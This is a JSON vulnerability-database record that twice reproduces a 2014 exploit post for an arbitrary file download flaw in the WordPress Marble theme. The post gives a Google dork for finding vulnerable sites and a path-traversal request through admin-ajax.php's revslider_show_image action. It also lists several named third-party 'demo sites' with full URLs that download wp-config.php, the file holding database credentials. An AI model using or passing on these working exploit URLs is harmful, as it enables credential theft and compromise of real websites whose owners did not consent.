{"published": "2014-09-17T00:00:00", "id": "1337DAY-ID-22650", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:25:30", "bulletin": {"published": "2014-09-17T00:00:00", "id": "1337DAY-ID-22650", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T01:25:30", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "b9e26a820b040f37619b35d34e8c0481876e9060bb27c158fa84946381483f3d", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:25:30", "edition": 1, "title": "WordPress Theme Marble Arbitrary File Download Vulnerability", "href": "http://0day.today/exploit/description/22650", "modified": "2014-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "http://0day.today/exploit/22650", "references": [], "reporter": "null_pointer", "sourceData": "Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability\r\n\r\nExploit Author : NULL_Pointer\r\n\r\nDate : 17/09/2014\r\n\r\nVendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650\r\n\r\nVersion: 1.1.2\r\n\r\nGoogle Dork : inurl:\"/wp-content/themes/marble/\"\r\n\r\nTested on : Linux, Windows 7\r\n\r\n--------------------------------------------------------------\r\n\r\nWordPress Theme Marble suffers from Arbitrary File Download Vulnerability.\r\n\r\nExploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]\r\n\r\nDemo Sites :\r\n\r\nhttp://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "155e59596c830b17290f2d7984bcc7de", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "52b89df2e22e15c3d2c162778815a51e", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e5fd65f28401ece7c8d8ab1dc181a43c", "key": "reporter"}, {"hash": "f170f2f63087a64ea9e1f15156b68e04", "key": "sourceData"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "33a34d32db0fbd47c51c03c1b1ba7171", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "f13d66f808b320063342210e74a2123137f1336e15a7c96cda502306cf52ecaf", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-04-02T21:31:07", "edition": 2, "title": "WordPress Theme Marble Arbitrary File Download Vulnerability", "href": "https://0day.today/exploit/description/22650", "modified": "2014-09-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 11, "cvelist": [], "sourceHref": "https://0day.today/exploit/22650", "references": [], "reporter": "null_pointer", "sourceData": "Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability\r\n\r\nExploit Author : NULL_Pointer\r\n\r\nDate : 17/09/2014\r\n\r\nVendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650\r\n\r\nVersion: 1.1.2\r\n\r\nGoogle Dork : inurl:\"/wp-content/themes/marble/\"\r\n\r\nTested on : Linux, Windows 7\r\n\r\n--------------------------------------------------------------\r\n\r\nWordPress Theme Marble suffers from Arbitrary File Download Vulnerability.\r\n\r\nExploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]\r\n\r\nDemo Sites :\r\n\r\nhttp://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\n\n# 0day.today [2018-04-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "ae66ce2c03b62d362e2fffa3325b1c33", "key": "href"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "modified"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e5fd65f28401ece7c8d8ab1dc181a43c", "key": "reporter"}, {"hash": "9383cd9d0fdb14c0973895d3ecfe2ca0", "key": "sourceData"}, {"hash": "eea27d7b826dce73c2a0721b47d7d39f", "key": "sourceHref"}, {"hash": "155e59596c830b17290f2d7984bcc7de", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{}